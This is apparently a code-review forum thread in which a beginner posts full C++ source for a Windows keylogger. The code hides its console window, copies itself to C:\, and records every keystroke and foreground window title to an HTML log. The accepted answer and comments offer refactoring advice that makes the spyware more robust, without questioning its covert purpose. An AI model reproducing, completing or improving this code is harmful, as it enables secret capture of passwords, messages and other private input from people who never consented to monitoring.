# Windows Keylogger

Tags: c++, windows, winapi

I am newbie (here and in C/C++ - WinAPI) so I want to ask you, what you think about my [Windows Keylogger in C++](https://github.com/SKocur/ForFun/blob/master/h3wroKeylogger.cpp)? I've worked on it a few days.

Features of keylogger for now:

- Self-copying to C:\ directory
- Saving keystrokes to an .html file
- Working in background

My questions:

- Are names of variables are correct?
- What can I do to improve getting foreground window (actually not always works)?

**h3wroKeylogger.cpp**

```
#include <windows.h>
#include <iostream>
#include <string>
#include <fstream>
#include <ctime>
#include <shlobj.h>

HWND hCurrentWindow;
char sWindowTitle[256];
bool is_capslock = false;
int iBackspaceCounter = 0;

int save(int key)
{
std::ofstream out_file;
out_file.open("logs.html", std::ios_base::app);
std::string sLogs = "";
time_t t = time(0);

if (hCurrentWindow != GetForegroundWindow())
{
    hCurrentWindow = GetForegroundWindow();
    char title[256];
    GetWindowTextA(hCurrentWindow, title, sizeof(title));

    sLogs += "<font size=\"3\"><br><br><b>";
    sLogs += asctime(localtime(&t));
    sLogs += "<br>Window name: ";
    sLogs += title;
    sLogs += "]</b><br></font>";
}

if ((GetAsyncKeyState(VK_CAPITAL) & 0x0001) != 0) {
    is_capslock = true;
}

switch (key) {
case 1:
    return 0;
    break;
case 2:
    return 0;
    break;
    //-----------------------------------------------------------------------
    //End of mouse
    //-----------------------------------------------------------------------
case 96:
    iBackspaceCounter = 0;
    sLogs += "0";
    break;
case 97:
    iBackspaceCounter = 0;
    sLogs += "1";
    break;
case 98:
    iBackspaceCounter = 0;
    sLogs += "2";
    break;
case 99:
    iBackspaceCounter = 0;
    sLogs += "3";
    break;
case 100:
    iBackspaceCounter = 0;
    sLogs += "4";
    break;
case 101:
    iBackspaceCounter = 0;
    sLogs += "5";
    break;
case 102:
    iBackspaceCounter = 0;
    sLogs += "6";
    break;
case 103:
    iBackspaceCounter = 0;
    sLogs += "7";
    break;
case 104:
    iBackspaceCounter = 0;
    sLogs += "8";
    break;
case 105:
    iBackspaceCounter = 0;
    sLogs += "9";
    break;
    //-----------------------------------------------------------------------
    //End of numpad digits
    //-----------------------------------------------------------------------
case 48:
    iBackspaceCounter = 0;
    if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
        sLogs += ")";
    }
    else
        sLogs += "0";
    break;
case 49:
    iBackspaceCounter = 0;
    if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
        sLogs += "!";
    }
    else
        sLogs += "1";
    break;
case 50:
    iBackspaceCounter = 0;
    if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
        sLogs += "@";
    }
    else
        sLogs += "2";
    break;
case 51:
    iBackspaceCounter = 0;
    if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
        sLogs += "#";
    }
    else
        sLogs += "3";
    break;
case 52:
    iBackspaceCounter = 0;
    if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
        sLogs += "$";
    }
    else
        sLogs += "4";
    break;
case 53:
    iBackspaceCounter = 0;
    if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
        sLogs += "%";
    }
    else
        sLogs += "5";
    break;
case 54:
    iBackspaceCounter = 0;
    if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
        sLogs += "^";
    }
    else
        sLogs += "6";
    break;
case 55:
    iBackspaceCounter = 0;
    if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
        sLogs += "&";
    }
    else
        sLogs += "7";
    break;
case 56:
    iBackspaceCounter = 0;
    if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
        sLogs += "*";
    }
    else
        sLogs += "8";
    break;
case 57:
    iBackspaceCounter = 0;
    if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
        sLogs += "(";
    }
    else
        sLogs += "9";
    break;
    //-----------------------------------------------------------------------
    //End of digits
    //-----------------------------------------------------------------------
case 65:
    iBackspaceCounter = 0;
    if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
        if (GetAsyncKeyState(VK_MENU)) {
            sLogs += "&#260";
        }
        else
            sLogs += "A";
    }
    else {
        if (GetAsyncKeyState(VK_MENU)) {
            sLogs += "&#261";
        }
        else
            sLogs += "a";
    }
    break;
case 66:
    iBackspaceCounter = 0;
    if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
        sLogs += "B";
    }
    else
        sLogs += "b";
    break;
case 67:
    iBackspaceCounter = 0;
    if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
        if (GetAsyncKeyState(VK_MENU)) {
            sLogs += "&#262";
        }
        else {
            sLogs += "C";
        }
    }
    else {
        if (GetAsyncKeyState(VK_MENU)) {
            sLogs += "&#263";
        }
        else {
            sLogs += "c";
        }
    }
    break;
case 68:
    iBackspaceCounter = 0;
    if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
        sLogs += "D";
    }
    else
        sLogs += "d";
    break;
case 69:
    iBackspaceCounter = 0;
    if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
        if (GetAsyncKeyState(VK_MENU)) {
            sLogs += "&#280";
        }
        else {
            sLogs += "E";
        }
    }
    else {
        if (GetAsyncKeyState(VK_MENU)) {
            sLogs += "&#281";
        }
        else {
            sLogs += "e";
        }
    }
    break;
case 70:
    iBackspaceCounter = 0;
    if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
        sLogs += "F";
    }
    else
        sLogs += "f";
    break;
case 71:
    iBackspaceCounter = 0;
    if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
        sLogs += "G";
    }
    else
        sLogs += "g";
    break;
case 72:
    iBackspaceCounter = 0;
    if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
        sLogs += "H";
    }
    else
        sLogs += "h";
    break;
case 73:
    iBackspaceCounter = 0;
    if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
        sLogs += "I";
    }
    else
        sLogs += "i";
    break;
case 74:
    iBackspaceCounter = 0;
    if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
        sLogs += "J";
    }
    else
        sLogs += "j";
    break;
case 75:
    iBackspaceCounter = 0;
    if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
        sLogs += "K";
    }
    else
        sLogs += "k";
    break;
case 76:
    iBackspaceCounter = 0;
    if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
        if (GetAsyncKeyState(VK_MENU)) {
            sLogs += "&#321";
        }
        else {
            sLogs += "L";
        }
    }
    else {
        if (GetAsyncKeyState(VK_MENU)) {
            sLogs += "&322";
        }
        else {
            sLogs += "l";
        }
    }
    break;
case 77:
    iBackspaceCounter = 0;
    if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
        sLogs += "M";
    }
    else
        sLogs += "m";
    break;
case 78:
    iBackspaceCounter = 0;
    if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
        if (GetAsyncKeyState(VK_MENU)) {
            sLogs += "&#323";
        }
        else {
            sLogs += "N";
        }
        break;
    }
    else {
        if (GetAsyncKeyState(VK_MENU)) {
            sLogs += "&#324";
        }
        else {
            sLogs += "n";
        }
    }
    break;
case 79:
    iBackspaceCounter = 0;
    if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
        if (GetAsyncKeyState(VK_MENU)) {
            sLogs += "&#211";
        }
        else {
            sLogs += "O";
        }
        break;
    }
    else {
        if (GetAsyncKeyState(VK_MENU)) {
            sLogs += "&#243";
        }
        else {
            sLogs += "o";
        }
    }
    break;
case 80:
    iBackspaceCounter = 0;
    if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
        sLogs += "P";
        break;
    }
    else
        sLogs += "p";
    break;
case 81:
    iBackspaceCounter = 0;
    if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
        sLogs += "Q";
        break;
    }
    else
        sLogs += "q";
    break;
case 82:
    iBackspaceCounter = 0;
    if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
        sLogs += "R";
        break;
    }
    else
        sLogs += "r";
    break;
case 83:
    iBackspaceCounter = 0;
    if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
        if (GetAsyncKeyState(VK_MENU)) {
            sLogs += "&#346";
        }
        else {
            sLogs += "S";
        }
        break;
    }
    else {
        if (GetAsyncKeyState(VK_MENU)) {
            sLogs += "&#347";
        }
        else {
            sLogs += "s";
        }
    }
    break;
case 84:
    iBackspaceCounter = 0;
    if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
        sLogs += "T";
        break;
    }
    else
        sLogs += "t";
    break;
case 85:
    iBackspaceCounter = 0;
    if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
        sLogs += "U";
        break;
    }
    else {
        if (GetAsyncKeyState(VK_MENU)) {
            sLogs += "€";
        }
        else {
            sLogs += "u";
        }
    }
    break;
case 86:
    iBackspaceCounter = 0;
    if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
        sLogs += "V";
        break;
    }
    else
        sLogs += "v";
    break;
case 87:
    iBackspaceCounter = 0;
    if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
        sLogs += "W";
        break;
    }
    else
        sLogs += "w";
    break;
case 88:
    iBackspaceCounter = 0;
    if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
        if (GetAsyncKeyState(VK_MENU)) {
            sLogs += "&#377";
        }
        else {
            sLogs += "X";
        }
        break;
    }
    else {
        if (GetAsyncKeyState(VK_MENU)) {
            sLogs += "&#378";
        }
        else {
            sLogs += "x";
        }
    }
    break;
case 89:
    iBackspaceCounter = 0;
    if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
        sLogs += "Y";
        break;
    }
    else
        sLogs += "y";
    break;
case 90:
    iBackspaceCounter = 0;
    if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
        if (GetAsyncKeyState(VK_MENU)) {
            sLogs += "&#379";
        }
        else {
            sLogs += "Z";
        }
        break;
    }
    else {
        if (GetAsyncKeyState(VK_MENU)) {
            sLogs += "&#380";
        }
        else {
            sLogs += "z";
        }
    }
    //-----------------------------------------------------------------------
    //End of A-Z characters
    //-----------------------------------------------------------------------
case 13:
    iBackspaceCounter = 0;
    sLogs += "\n";
    break;
case 20:
    iBackspaceCounter = 0;
    if (is_capslock == false) {
        is_capslock = true;
        sLogs += "<font size=\"1\">[CapsLock]</font>";
    }
    else {
        is_capslock = false;
        sLogs += "<font size=\"1\">[/CapsLock]</font>";
    }
    break;
case VK_BACK:
    iBackspaceCounter += 1;
    sLogs += "<font size=\"1\">[";
    sLogs += iBackspaceCounter + '0';
    sLogs += "x";
    sLogs += "Backspace]</font>";
    break;
case VK_SPACE:
    iBackspaceCounter = 0;
    sLogs += " ";
    break;
case VK_MULTIPLY:
    iBackspaceCounter = 0;
    sLogs += "*";
    break;
case VK_ADD:
    iBackspaceCounter = 0;
    sLogs += "+";
    break;
case VK_SUBTRACT:
    iBackspaceCounter = 0;
    sLogs += "-";
    break;
case VK_DECIMAL:
    iBackspaceCounter = 0;
    sLogs += ".";
    break;
case VK_DIVIDE:
    iBackspaceCounter = 0;
    sLogs += "/";
    break;
default:
    break;
}

out_file << sLogs;
out_file.close();
return 0;
}

void stealth() {
HWND stealth;
AllocConsole();
stealth = FindWindowA("consoleWindowClass", NULL);
ShowWindow(stealth, 0);
}

using namespace std;
int main(int argc, char * argv[]) {
stealth();

char buffer[MAX_PATH];
::GetModuleFileNameA(NULL, buffer, MAX_PATH);

//It swap / with //
char sPath[MAX_PATH];
int iIndexCounter = 0;
for (int i = 0; i <= MAX_PATH; i++) {
    if (buffer[i] == '\\') {
        sPath[i + iIndexCounter] = '\\';
        iIndexCounter += 1;
        sPath[i + iIndexCounter] = '\\';
        continue;
    }
    sPath[i + iIndexCounter] = buffer[i];
}

char sDocumentsPath[MAX_PATH];
HRESULT result = SHGetFolderPathA(NULL, CSIDL_PERSONAL, NULL, 0, sDocumentsPath);
char sDocumentsPathResult[MAX_PATH];

//It swap / with //
int iIndexCounterDoc = 0;
for (int i = 0; i <= MAX_PATH; i++) {
    if (sDocumentsPath[i] == '\\') {
        sDocumentsPathResult[i + iIndexCounterDoc] = '\\';
        iIndexCounterDoc += 1;
        sDocumentsPathResult[i + iIndexCounterDoc] = '\\';
        continue;
    }
    sDocumentsPathResult[i + iIndexCounterDoc] = sDocumentsPath[i];
}

char sCompleteDocPath[MAX_PATH];
strcpy(sCompleteDocPath, sDocumentsPathResult);
//strcpy(sCompleteDocPath, "\\h3wro.exe");

BOOL b = CopyFileA(sPath, "C:\\h3wro.exe", 0);
if (!b) {
    std::cout << "Error: " << GetLastError() << std::endl;
}
else {
    std::cout << "Okay " << std::endl;
}
char i;
while (1) {
    for (i = 8; i <= 190; i++) {
        if (GetAsyncKeyState(i) == -32767)
            save(i);
    }
}
return 0;
}
```

Comment: You are supposing a En-US keyboard layout. In my Spanish-MX keyboard the characters are in different places than what you suppose in your code, so you'll get my logged keystrokes wrong.

Comment: Why not use [SetWindowsHookEx](https://msdn.microsoft.com/es-es/library/windows/desktop/ms644990.aspx)? `While(1)` and `for (i = 8; i <= 190; i++)` looks like really odd.

Comment: @david - I appreciate your edit request, but I rejected it - "If there are spacing issues, it's a good point to address in a code review. Since the edit is not by the OP, I rejected it." I think between your suggestion here and the spacing you corrected, you have a decent answer to post.

Comment: @fernando.reyes Really sorry, I forgot about this.

Answer (score 8, accepted):

A few thoughts:

### 1. Fix your formatting

Code that appears within a function scope should be indented by another set of spaces (tab):

```
int save(int key)
{
std::ofstream out_file;
out_file.open("logs.html", std::ios_base::app);
std::string sLogs = "";
// ...
}
```

=>

```
int save(int key)
{
    std::ofstream out_file;
    out_file.open("logs.html", std::ios_base::app);
    std::string sLogs = "";
    // ...
}
```

### 2. Do not use `using namespace std;`

While that would work in your particular case, it's considered bad practice. Especially when you move out your code to separate header files.

See more details here please:

[Why is “using namespace std;” considered bad practice?](https://stackoverflow.com/q/1452721/14065)

Also, you're prefixing your standard classes in use with `std::` anyways.

### 3. C++ offers classes, use them

Instead of using global variables, encapsulate your stateful data in a class:

```
 class MyKeyLogger {
     HWND hCurrentWindow;
     char sWindowTitle[256];
     bool is_capslock = false;
     int iBackspaceCounter = 0;

 public:
     int save(int key);
 };
```

### 4. Use `ofstream` efficiently

Opening and closing `out_file` on every keystroke looks extremely inefficient for me.

With the above mentioned class approach, you could make `out_file` a member variable, and initialize it once in the constructor:

```
 class MyKeyLogger {
     // ...
     std::ofstream out_file;

 public:
      MyKeyLogger(std::string logfilename = "logs.html") {
          out_file.open(logfilename , std::ios_base::app);
      }
      // ...
 };
```

In the `save()` function, it's enough to call `out_file.flush();` to update the file then, instead of closing the stream.

### 5. Avoid large `switch()` statements / `if() else if()` cascades

Such kind of code is hard to read and maintain consistently.

Also I've seen that you're repeating a lot of boiler plate code, for numerous cases, e.g.:

```
case 66:
    iBackspaceCounter = 0;
    if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
        sLogs += "B";
    }
    else
        sLogs += "b";
    break;

// ...
case 68:
    iBackspaceCounter = 0;
    if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
         sLogs += "D";
    }
    else
         sLogs += "d";
    break;
```

A better approach would be probably to setup a small interface and a set of concrete implementations that handle particular keystrokes uniformely:

```
struct IKeyStrokeHandler {
    virtual ~IKeyStrokeHandler() {}
    bool handlesKey(int key) const = 0;
    std::string doKeyTranslation(int key) const = 0;
};
```

---

```
// Partial implementation
class AbstractKeyStrokeHandler : public IKeyStrokeHandler {
     class Key;
     std::map<int,Key> handledKeys_;             
protected:
     struct Key {
          string standardRepresentation;
          string shiftRepresentation;
     };
     AbstractKeyStrokeHandler(const std::map<int,Key>& handledKeys) 
     : handledKeys_(handledKeys) {
     }
public:
     bool handlesKey(int key) {
         return (handledKeys_.find(key) != handledKeys_.end());
     }
     // Retrieve the mapped values accordigly
     std::string doKeyTranslation(int key) const {
          if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
              return handledKeys_[key].shiftRepresentation;
          }                  
          return handledKeys_[key].standardRepresentation;
    }             
};
```

---

```
// A concrete implemetation for simple key translations
class SimpleKeyStrokeHandler : public AbstractKeyStrokeHandler {
public:
    SimpleKeyStrokeHandler() : AbstractKeyStrokeHandler(
        std::map{ 
            {66, {"b", "B"},
            {68, {"d", "D"},
        } )
    {}
 };
```

---

```
 // Mouse key handler
 class MouseKeyStrokeHandler : public AbstractKeyStrokeHandler {
 public:
     MouseKeyStrokeHandler () : AbstractKeyStrokeHandler(
         std::map{ 
                   {0, {"", ""},
                   {1, {"", ""},
               } )
     {}
 };
```

---

```
// Special key handler
class SpecialKeyStrokeHandler : public AbstractKeyStrokeHandler {
    int& iBackSpaceCounter_;
public:
    SpecialKeyStrokeHandler(int& iBackSpaceCounter) 
    : AbstractKeyStrokeHandler(
        std::map{ 
                  {96, {"0", "0"},
                  {97, {"1", "1"},
                  // ...
                  {105, {"9", "9"},

              } ),
    , iBackSpaceCounter_(iBackSpaceCounter)
    {}
    std::string doKeyTranslation(int key) const {
        iBackSpaceCounter_ = 0;
        return AbstractKeyStrokeHandler::doKeyTranslation(key);
 };
```

---

The various key handler implementations could be used in your key logger class like so:

```
class MyKeylogger {
    std::vector<std::unique_ptr<IKeyStrokeHandler> keyStrokeHandlers;

    MyKeyLogger() {
        keyStrokeHandlers.push_back(std::make_unique<SimpleKeyStrokeHandler>());
        keyStrokeHandlers.push_back(std::make_unique<MouseKeyStrokeHandler>());
        keyStrokeHandlers.push_back(std::make_unique<SpecialKeyStrokeHandler>(iBackspaceCounter));
    }
int save(int key)
{    
    // ...
    for(const auto& keyStrokeHandler : keyStrokeHandlers) {
        if(keyStrokeHandler->handlesKey(key)) {
            sLogs += keyStrokeHandler->doKeyTranslation(key);
        }
    }

};
```

Comment: I changed `using namespace std` to `using std::cout` and `using std::endl`. Thank you for answer!

Comment: @h3wro I usually don't bother with typing out these 5 more characters (`std::`). It's more hassle to keep all your `using` statements consistent all the time than doing so.

Comment: @h3wro I think the most important (but even most complex) part of my answer is **5.**.  You seriously should consider to refactor that tedious `switch()/case:` mess.

Comment: I know, that it is mess. Now  I'm reading docs about it.

Comment: @h3wro My proposal was the simplest thing that came to my mind. There will be better design approaches of course. Start thinking OOP and make use of interfaces.

Comment: For me (now) OOP is much easier to implement than this 5 step.

Comment: @h3wro I don't get what you're saying?

Comment: I'm trying to use your solution.

Comment: @h3wro Ah, OK. As mentioned there are several ways to implement that . IMO the `Key` mapped implementation cries out for the [Flyweight Pattern](https://sourcemaking.com/design_patterns/flyweight/cpp/1), and certain `Key` traits instantiated for particular keyboard layouts as mentioned by [f@ernando.reyes](http://codereview.stackexchange.com/questions/153668/windows-keylogger/153689?noredirect=1#comment290768_153668).

Comment: Found the Java guy. Really? `      keyStrokeHandlers.push_back(std::make_unique<SpecialKeyStrokeHandler>(iBackspaceCounter));` This is auto-deprecating code. Interface, abstract class, what more?